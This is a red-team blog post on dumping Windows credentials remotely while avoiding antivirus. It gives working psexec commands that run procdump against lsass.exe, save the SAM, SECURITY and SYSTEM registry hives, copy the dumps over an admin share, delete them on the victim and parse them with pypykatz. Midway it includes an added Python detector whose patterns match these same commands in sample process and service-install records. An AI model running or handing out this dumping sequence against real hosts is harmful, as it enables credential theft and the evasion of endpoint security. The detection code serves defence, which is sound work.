Evading Antivirus When Dumping Passwords Remotely
During Red Team engagements, I frequently gain RCE (remote code execution) on a host by using credentials I gained from a previous attack. This RCE could come in the form of psexec, SQL commands or even a full Remote Desktop session. One of my first objectives at this point is to determine whether endpoint security (antivirus) software is installed on the remote victim. If it is not, I'll typically run mimikatz.
If endpoint security software is installed, it is generally still a trivial task to harvest credentials by dumping lsass.exe and the SAM. This sort of dump is often not blocked by antivirus (I tested several products). This post focuses on how to perform the dumps with psexec and how to parse the output with pypykatz. I demonstrate this in a lab environment, using psexec to authenticate to the victim and dump remotely.
Test environment
This attack could be done with a single attack machine, but I used two attack VMs:
1. Windows 10 - Uses psexec to perform the dumps remotely
2. Kali Linux 2020.3 - Runs pypykatz to parse the files for credentials
The victim VM was running Windows 10.
The Attack
After downloading procdump and psexec onto the Windows attack box, I performed the lsass.exe dump against the remote victim:
psexec \\192.168.0.100 -u testuser -p password123 -e -h -s -c procdump -accepteula -ma lsass.exe c:\lsass.dmp
Note that the -c option copies procdump to the remote victim, which keeps things simple. This is already enough to recover the credentials held in RAM, but I want to get the SAM as well:
psexec \\192.168.0.100 -u testuser -p password123 -e -h -s cmd /c reg save hklm\system c:\sys.hiv ^& reg save hklm\security c:\sec.hiv ^& reg save hklm\sam c:\sam.hiv
Notice the ^ used to escape the &. Now it's time to download the l00t:
net use x: /user:testuser \\192.168.0.100\c$ password123
copy x:\lsass.dmp
copy x:\*.hiv
del x:\lsass.dmp x:\sam.hiv x:\sec.hiv x:\sys.hiv
This completes the active portion of the attack, and the rest involves parsing the resulting files.
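From the defender's side, every step of the sequence above leaves a recognisable trail on the victim: psexec installs its PSEXESVC service (System log Event ID 7045), the dump and hive exports run as processes spawned by that service, and their command lines contain procdump with -ma against lsass and reg save against the SAM, SECURITY and SYSTEM hives. The following detector is an added example, not part of the original post or of any tool it mentions. It runs over constructed, Sysmon-style process-creation (Event ID 1) and service-install (Event ID 7045) records; the dictionary field names are an assumption for the example, not a real log schema.

```python
import re
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    evidence: str


# Command-line patterns for the two dump techniques shown in the post:
# a full-memory procdump of lsass, and reg save of the credential hives.
LSASS_DUMP_RE = re.compile(
    r"procdump(?:64)?(?:\.exe)?\b.*\s-ma\b.*\blsass", re.IGNORECASE)
HIVE_SAVE_RE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|security|system)\b", re.IGNORECASE)
# Processes whose parent is the psexec service binary were started remotely.
PSEXESVC_PARENT_RE = re.compile(r"\\PSEXESVC\.exe$", re.IGNORECASE)

# Constructed sample telemetry (not a real capture). Field names are an
# assumption modelled loosely on Sysmon Event ID 1 and System Event ID 7045.
SAMPLE_EVENTS = [
    {"event_id": 7045, "host": "VICTIM-PC", "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"event_id": 1, "host": "VICTIM-PC", "user": r"NT AUTHORITY\SYSTEM",
     "parent_image": r"C:\Windows\PSEXESVC.exe",
     "command_line": r"procdump -accepteula -ma lsass.exe c:\lsass.dmp"},
    {"event_id": 1, "host": "VICTIM-PC", "user": r"NT AUTHORITY\SYSTEM",
     "parent_image": r"C:\Windows\PSEXESVC.exe",
     "command_line": (r"cmd /c reg save hklm\system c:\sys.hiv & "
                      r"reg save hklm\security c:\sec.hiv & "
                      r"reg save hklm\sam c:\sam.hiv")},
    # Benign registry read from an interactive session: must not alert.
    {"event_id": 1, "host": "VICTIM-PC", "user": r"VICTIM-PC\alice",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"reg query hklm\software\microsoft\windows"},
]


def evaluate(event: dict) -> list[Finding]:
    """Apply every rule to one event and return the findings it produces."""
    host = event.get("host", "?")
    findings: list[Finding] = []

    if (event.get("event_id") == 7045
            and event.get("service_name", "").upper() == "PSEXESVC"):
        findings.append(Finding("psexec_service_installed", host,
                                event.get("image_path", "")))

    if event.get("event_id") == 1:
        cmd = event.get("command_line", "")
        if LSASS_DUMP_RE.search(cmd):
            findings.append(Finding("lsass_memory_dump", host, cmd))
        # One finding per hive, so a chained "a & b & c" export is fully reported.
        for m in HIVE_SAVE_RE.finditer(cmd):
            findings.append(Finding(
                f"registry_hive_export:{m.group(1).lower()}", host, cmd))
        if PSEXESVC_PARENT_RE.search(event.get("parent_image", "")):
            findings.append(Finding("process_spawned_by_psexec", host, cmd))

    return findings


def scan(events: Iterable[dict]) -> list[Finding]:
    """Run the rules over a stream of events and collect all findings."""
    out: list[Finding] = []
    for ev in events:
        out.extend(evaluate(ev))
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.evidence}")
```

The command-line rules catch the exact invocations from the post; the parent-process rule is broader and flags anything PSEXESVC launches, which is what makes the chained cmd /c export visible even if the individual reg.exe children were renamed or missed.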
Parsing
Next, I used pypykatz to parse the files:
pypykatz lsa minidump lsass.dmp
pypykatz registry --sam sam.hiv --security sec.hiv sys.hiv
Depending on various factors, you may end up harvesting cleartext passwords (as shown in the first screenshot above) or NTLM password hashes.
If you prefer to use mimikatz for this parsing, the commands can be found here: https://www.vanimpe.eu/2019/03/07/mimikatz-and-hashcat-in-practice/